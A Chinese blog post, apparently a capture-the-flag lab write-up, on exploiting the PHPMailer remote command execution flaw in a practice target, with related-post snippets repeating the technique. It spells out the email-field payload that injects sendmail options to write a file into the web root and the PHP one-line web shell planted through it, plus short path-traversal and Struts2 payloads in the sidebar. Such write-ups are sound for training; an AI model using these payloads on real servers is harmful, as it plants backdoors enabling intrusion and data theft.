0x2C.PHPMailer远程命令执行漏洞溯源

最新推荐文章于 2022-10-01 15:08:53 发布
最新推荐文章于 2022-10-01 15:08:53 发布
阅读量236 收藏
点赞数
分类专栏: 墨者学院 文章标签: 墨者学院 PHPMailer
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31679787/article/details/102723609
版权

在页面的最下方能够发现一个mail连接,点击能够进入发送邮件的界面,或者使用burpsuite的spider模块同样能够找到mail界面;

填写数据后点击发送邮件并进行抓包;

修改email和message的内容;

"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/b.php @aaa.com

<?php @eval($_POST[cmd]);?>

发包后没有回显,但是能够正常写入文件;

poc解析:

-OQueueDirectory=/tmp    选择一个可以写的目录保存临时文件;

-X/var/www/html/b.php    保存日志文件到任意目录;

写入过程稍慢,完成后能够访问b.php;

使用菜刀连接,发现写入的文件,并且在根目录中找到key文件;

漏洞解析详情:

https://www.anquanke.com/post/id/85295

半情调
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院-PHPMailer远程命令执行漏洞溯源
qq_47094508的博客
07-01 918
拿到靶场之后点击访问分享一个小工具,用来爬取相关的url Link Gopher可以看到有用的就一个mail.php 进入之后来到一个邮件测试页面,很明显这里是一个功能点 phpmailer介绍PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务。相关漏洞CVE编号(CVE-2016-10033)burp抓包,更改email处payload为 更改message处payload为 然后访问http://124.70.71.251
360众测靶场题库之22-PHPMailer远程命令执行漏洞溯源
最新发布
zjl12344的博客
03-07 184
360众测靶场题库
PHPMailer远程命令执行漏洞复现
小小猪的博客
12-13 1553
PHPMailer远程命令执行漏洞复现 漏洞简介: PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。 PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。 影响版本: PHPMailer<5.2.18 环境搭建: 这里采用现成靶机 漏洞复现: aaa "aaa". -O
墨者 - PHPMailer远程命令执行漏洞溯源
吃肉唐僧的博客
06-30 1479
用bp抓包,发现与后台交互的文件 构建email "aaa".-OQueueDirectory=/tmp/.-X/var/www/html/a.php@ aaa.com message <?php@eval($_REQUEST[a]);?> 访问a.php文件,上传成功 菜刀无惧链接 原理参考:https...
PHPMailer远程命令执行漏洞溯源
weixin_47493074的博客
10-01 757
PHPMailer远程命令执行漏洞溯源
墨者PHPMailer远程命令执行漏洞溯源题解
zr1213159840的博客
01-07 467
打开环境后,给了一个页面,但是啥也没有,看不出来 对目录进行一下爆破试试,使用dirsearch,能看到有个mail.php 百度一下看下这个phpmailer有什么问题,发现存在命令执行漏洞,那么就是按照步骤跑就行了。 打开xxx/mail.php页面,在you name栏里面随便写啥,比如abc。在your email栏中填入:“aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @ aaa.com 在your message中填入一句话木马 &
墨者学院_PHPMailer远程命令执行漏洞溯源
cc_de_csdn的博客
08-26 290
1.打开靶场,找到发送邮件的位置,进入邮件页面 2.填写邮件消息 1.任意用户名 2.在email写入: “aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com 3.在message写入: <?php @eval($_POST[a]);?> 3.使用菜刀连接,链接是:http://219.153.49.228:4105...
墨者靶场 初级:PHPMailer远程命令执行漏洞溯源
qq_43233085的博客
01-14 672
墨者靶场 初级:PHPMailer远程命令执行漏洞溯源题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师对某网站进行授权测试,发现了一个管理员留下的邮件测试页面,你能帮他完成测试吗 实训目标 1、了解PHPMailer用处; 2、了解Burp suite中Spider模块使用方法; 3、了解PHPMailer远程命令执行漏洞形成原因; 4、了解PHPMailer远程命令执行漏洞利用...
经典CVE:PHPMailer 远程命令执行漏洞
zh的博客
10-15 531
靶场地址:http://whalwl.site:8038/ 解题准备:了解PHPMailer 远程命令执行漏洞的利用方法 解题思路: 1、在右键发送页面,构造一句话 2、提示发送失败,但其实一句话已经完成 3、 尝试访问一句话,成功 4、蚁剑连接成功,去找flag把 ...
class.phpmailer.php
02-17
class.phpmailer.php类
在线靶场-墨者-命令执行2星-PHPMailer远程命令执行漏洞溯源
weixin_42079912的博客
08-09 360
打开靶场网页,根据题意管理员留下的邮件测试页面。于是寻找邮件测试页面。 打开邮件测试页面。 使用邮件注入木马 You name:mozhe(随便输入) Your email:“abc”. -OQueueDirectory=/tmp/. -X/var/www/html/abc.php @abc.com(abc可更改) You message:<?php @eval($_POST[abc])...
WordPress 4.6(PHPMailer)命令执行漏洞 (CVE-2016-10033)
SoulCat
02-08 4757
WordPress &lt;= 4.6 命令执行漏洞(CVE-2016-10033) 漏洞概述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行漏洞版本: WordPress &lt;= 4.6.0 PH...
0x21.Apache Struts2远程代码执行漏洞(S2-007)复现
qq_31679787的博客
10-16 6584
s2-007:当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行; 抓包,在age值处输入poc; poc:'+(#application)+' 判断出在age输入框存在s2-007漏洞; 输入poc查找key文件位置,得到key值; poc:%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%...
0x14.密码学加解密实训(JavaScript分析)
qq_31679787的博客
09-23 1653
查看页面源代码,发现js中有登录成功跳转的页面; 直接访问泄露的页面,得到key;
0x1C.uWSGI 漏洞复现(CVE-2018-7490)
qq_31679787的博客
10-14 1522
uWSGI存在路径遍历; payload: ​http://219.153.49.228:48681/..%2f..%2f..%2f..%2f..%2f..%2fkey.txt CVE-2018-7490漏洞详情: https://www.anquanke.com/vul/id/1124864
0x16.密码学加解密实训(摩斯密码第1题)
qq_31679787的博客
09-23 1177
下载文件,使用记事本打开,发现文件头为wave格式,wave为音频文件,使用音频播放器打开文件; 打开后发现是摩斯密码的打点,记录下打点,通过摩斯密码本翻译出密码; 输入后得到key值; ...
0x01.phpMyAdmin后台文件包含分析溯源
qq_31679787的博客
09-11 965
登录界面; phpmyadmin的默认账户名密码是root/空,或者是root/root,尝试后发现是root/root; 通过打开新的phpmyadmin窗口,发现所有参数; 根据cve-2018-12613漏洞可以得到网站根目录/var/www/html; 首先select '<?php phpinfo();?>';然后通过payload构造文件包含; payl...
0x26.Apache Struts2远程代码执行漏洞(S2-019)复现
qq_31679787的博客
10-21 965
s2-019:动态方法调用是一种已知会施加可能的安全漏洞的机制,但到目前为止,它默认启用,警告用户应尽可能将其关闭; 构造poc: ?debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set...
composer安装.PHPMailer
03-29
PHPMailer是一种用于发送电子邮件的PHP库。以下是在Composer中安装PHPMailer的步骤: 1. 打开终端或命令提示符,并切换到您的项目根目录。 2. 运行以下命令来初始化Composer: ``` composer init ``` 3. 按照提示...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值